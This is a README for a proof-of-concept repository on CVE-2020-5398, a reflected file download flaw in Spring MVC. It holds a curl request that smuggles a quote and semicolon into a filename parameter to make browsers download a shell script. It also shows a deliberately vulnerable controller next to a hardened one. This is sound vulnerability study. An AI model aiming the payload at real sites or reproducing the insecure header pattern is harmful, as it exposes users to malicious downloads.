# CVE-2020-5398 - RFD (Reflected File Download) Attack for Spring MVC
> In Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a “Content-Disposition” header in the response where the filename attribute is derived from user supplied input.
## Usage
1. Start the application:
   ```
   ./gradlew bootRun
   ```
   The server listens on `127.0.0.1:8080`.
2. Request a download:
   ```
   $ curl 'http://127.0.0.1:8080/?filename=sample&contents=Hello,%20World' --dump-header -
   HTTP/1.1 200
   Content-Disposition: attachment; filename="sample.txt"
   Content-Type: application/octet-stream
   Content-Length: 12
   Date: Fri, 17 Jan 2020 05:41:08 GMT
   Hello, World
   ```
   The response starts a download of `sample.txt`; the `filename` parameter becomes the file name and the `contents` parameter is reflected as the file body.
## PoC
### Insecure version (Spring Web 5.2.2)
```
$ curl 'http://127.0.0.1:8080/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.sh";.txt"
Content-Type: application/octet-stream
Content-Length: 14
Date: Fri, 17 Jan 2020 05:22:18 GMT
#!/bin/bash
id
```
The browser downloads `sample.sh` (a shell script): the `"` and `;` in the request parameter close the quoted `filename` value early, so the `.txt` suffix the application appends is no longer part of the name.
### Secure version (Spring Web 5.2.3)
```
$ curl 'http://127.0.0.1:8080/?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Aid' --dump-header -
HTTP/1.1 200
Content-Disposition: attachment; filename="sample.sh\";.txt"
Content-Type: application/octet-stream
Content-Length: 14
Date: Fri, 17 Jan 2020 05:24:47 GMT
#!/bin/bash
id
```
The browser downloads `sample.sh";.txt` (a text file): the quote is escaped as `\"`, so the whole value stays inside the quoted string and the `.txt` suffix is preserved.
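The two header-construction patterns side by side in a Spring MVC controller, as an added illustration rather than the repository's own `MainController.java`. It assumes Spring Web 5.2.3 or later (where `ContentDisposition.Builder.filename` escapes quotes); the class name, the `/insecure` and `/secure` paths and the allowlist pattern are assumptions chosen for this example. The allowlist is application-level defence in depth: it keeps the hardened endpoint safe even on a framework version without the escaping fix.

```java
// Added example, not the PoC repository's controller. Assumes Spring Web 5.2.3+
// (ContentDisposition escapes embedded quotes there); the allowlist check makes
// the hardened endpoint safe on older versions as well.
package com.example.cve_2020_5398.controller;

import java.nio.charset.StandardCharsets;
import java.util.regex.Pattern;

import org.springframework.http.ContentDisposition;
import org.springframework.http.HttpHeaders;
import org.springframework.http.HttpStatus;
import org.springframework.http.MediaType;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.server.ResponseStatusException;

@RestController
public class DownloadExampleController {

    // Hypothetical allowlist: letters, digits, '_' and '-' only, so a permitted
    // value can never contain '"', ';', '.', '/' or whitespace and therefore can
    // neither terminate the quoted-string nor change the extension.
    private static final Pattern SAFE_NAME = Pattern.compile("[A-Za-z0-9_-]{1,64}");

    // Vulnerable pattern (the shape the PoC above exercises): the request
    // parameter is concatenated straight into the quoted-string. A value that
    // contains '";' closes the quote early and the browser sees filename="sample.sh".
    // The reflected 'contents' parameter becomes the body of the downloaded file.
    @GetMapping("/insecure")
    public ResponseEntity<byte[]> insecure(@RequestParam String filename,
                                           @RequestParam String contents) {
        String header = "attachment; filename=\"" + filename + ".txt\"";
        return ResponseEntity.ok()
                .header(HttpHeaders.CONTENT_DISPOSITION, header)
                .contentType(MediaType.APPLICATION_OCTET_STREAM)
                .body(contents.getBytes(StandardCharsets.UTF_8));
    }

    // Hardened pattern: reject anything outside the allowlist with 400, then let
    // Spring build the header value. Since 5.2.3 ContentDisposition escapes an
    // embedded '"' as '\"', so the value stays inside the quoted-string.
    @GetMapping("/secure")
    public ResponseEntity<byte[]> secure(@RequestParam String filename,
                                         @RequestParam String contents) {
        if (!SAFE_NAME.matcher(filename).matches()) {
            throw new ResponseStatusException(HttpStatus.BAD_REQUEST, "invalid filename");
        }
        ContentDisposition disposition = ContentDisposition.builder("attachment")
                .filename(filename + ".txt")
                .build();
        HttpHeaders headers = new HttpHeaders();
        headers.setContentDisposition(disposition);
        return ResponseEntity.ok()
                .headers(headers)
                .contentType(MediaType.APPLICATION_OCTET_STREAM)
                .body(contents.getBytes(StandardCharsets.UTF_8));
    }
}
```

With the PoC request from the section above, `/secure` answers `400 Bad Request` because `sample.sh";` fails the allowlist, whereas the plain `filename=sample` request from the Usage section yields `Content-Disposition: attachment; filename="sample.txt"` exactly as before. Relying on the framework's escaping alone is enough against the quote break-out, but the allowlist also prevents a caller from choosing the extension at all, which is the property that matters for RFD.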
## References
- [CVE-2020-5398: RFD Attack via “Content-Disposition” Header Sourced from Request Input by Spring MVC or Spring WebFlux Application | Security | Pivotal](https://pivotal.io/security/cve-2020-5398)
- [NVD - CVE-2020-5398](https://nvd.nist.gov/vuln/detail/CVE-2020-5398)
- What is an RFD attack?
  - [eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf](https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf)
  - [Reflected File Download - OWASP](https://wiki.owasp.org/index.php/Reflected_File_Download)
- Fix commit
  - [ContentDisposition refactoring · spring-projects/spring-framework@956ffe6](https://github.com/spring-projects/spring-framework/commit/956ffe68587c8d5f21135b5ce4650af0c2dea933)
## Repository layout
```
[4.0K] /data/pocs/27718de8d31e2aea7a1ce63c10fb1d9463dd1e88
├── [ 939] build.gradle
├── [4.0K] gradle
│   └── [4.0K] wrapper
│       ├── [ 55K] gradle-wrapper.jar
│       └── [ 232] gradle-wrapper.properties
├── [5.2K] gradlew
├── [2.2K] gradlew.bat
├── [1.0K] LICENSE.md
├── [2.3K] README.md
├── [ 393] settings.gradle
└── [4.0K] src
    ├── [4.0K] main
    │   ├── [4.0K] java
    │   │   └── [4.0K] com
    │   │       └── [4.0K] example
    │   │           └── [4.0K] cve_2020_5398
    │   │               ├── [4.0K] controller
    │   │               │   └── [1.6K] MainController.java
    │   │               └── [ 328] Cve20205398Application.java
    │   └── [4.0K] resources
    │       └── [   1] application.properties
    └── [4.0K] test
        └── [4.0K] java
            └── [4.0K] com
                └── [4.0K] example
                    └── [4.0K] cve_2020_5398
                        └── [ 222] Cve20205398ApplicationTests.java

15 directories, 12 files
```